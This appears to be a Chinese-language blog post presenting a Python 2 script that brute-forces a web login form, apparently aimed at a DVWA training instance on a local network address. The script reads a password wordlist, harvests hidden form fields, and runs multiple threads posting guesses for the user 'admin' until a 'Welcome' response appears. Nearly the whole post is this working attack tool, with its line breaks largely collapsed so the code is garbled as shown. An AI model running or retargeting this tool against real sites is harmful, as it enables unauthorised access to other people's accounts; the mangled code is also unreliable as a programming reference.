python实现暴力破解

暴力破解"/>

python实现暴力破解

import urllib2
import urllib
import cookielib
import  threading
import sys
import Queue
from HTMLParser import HTMLParseruser_thread     =10
#这里登录名默认admin
username        ="admin"
#pass.txt中保存密码文本文件
wordlist_file   ="pass.txt"
resume          =None
#
target_url      ="http://192.168.31.113:8080/dvwa/login.php"
target_post     ="http://192.168.31.113:8080/dvwa/login.php"#用户名区域
username_field="username"
#密码区域
password_field="password"#检查是否成功登录
success_check="Welcome"class BruteParser(HTMLParser):def __init__(self):HTMLParser.__init__(self)self.tag_results={}def handle_starttag(self,tag,attrs):#找到<input>if tag=="input":tag_name=Nonetag_value=None
# for example <input type="hidden" name="NXX" id="IDXX" value="VXX" />
# name=type,value=hidden     name=name,value=NXX      name=id,value=IDXX     name=value,value="VXX"
#attrs中各标签的名字和值for name_tag,name_tag_value in attrs:#找到名字等于name的标签if name_tag=="name":#获得名字等于name的标签的值tag_name=name_tag_value#找到名字等于value的标签 if name_tag=="value":#获得名字等于value的标签的值tag_value=name_tag_value# 将标签和标签的值放入tag_results{}if tag_name is not None:self.tag_results[tag_name]=name_tag_valueclass Bruter():def __init__(self):#注意__init__  左右两边都是两个_#打开密码文件读取内容fd=open(wordlist_file,"rb")raw_words=fd.readlines()fd.close()found_resume=False#队列words=Queue.Queue()for word in raw_words:word=word.rstrip()if resume is not None:if found_resume:words.put(word)else:#如果中断，可以恢复if word==resume:found_resume=Trueprint("resuming from"+resume)else:words.put(word)self.username=usernameself.password_q=words#密码再保存到password_qself.found=False#是否找到正确密码print("finish setting for: %s" % username)def web_bruter(self):#密码队列没读取完且没找到正确密码while not self.password_q.empty() and not self.found:brute=self.password_q.get().rstrip()#存放cookiejar=cookielib.FileCookieJar("cookies")opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))#爬取目标网站内容response=opener.open(target_url)page=response.read()print("plan to brute")
#获得标签parser=BruteParser()parser.feed(page)post_tags=parser.tag_results
#传值给用户名区域post_tags[username_field]=self.username#传值给密码区域post_tags[password_field]=brute
#url编码post_tagslogin_data=urllib.urlencode(post_tags)login_response=opener.open(target_post,login_data)login_result=login_response.read()
#检查是否成功登录if success_check in login_result:self.found=Trueprint("success")print(username+":"+brute)# use more threads to start web_bruterdef run_bruteforce(self):for i in range(user_thread):t=threading.Thread(target=self.web_bruter)t.start()bruter_obj=Bruter()
bruter_obj.run_bruteforce()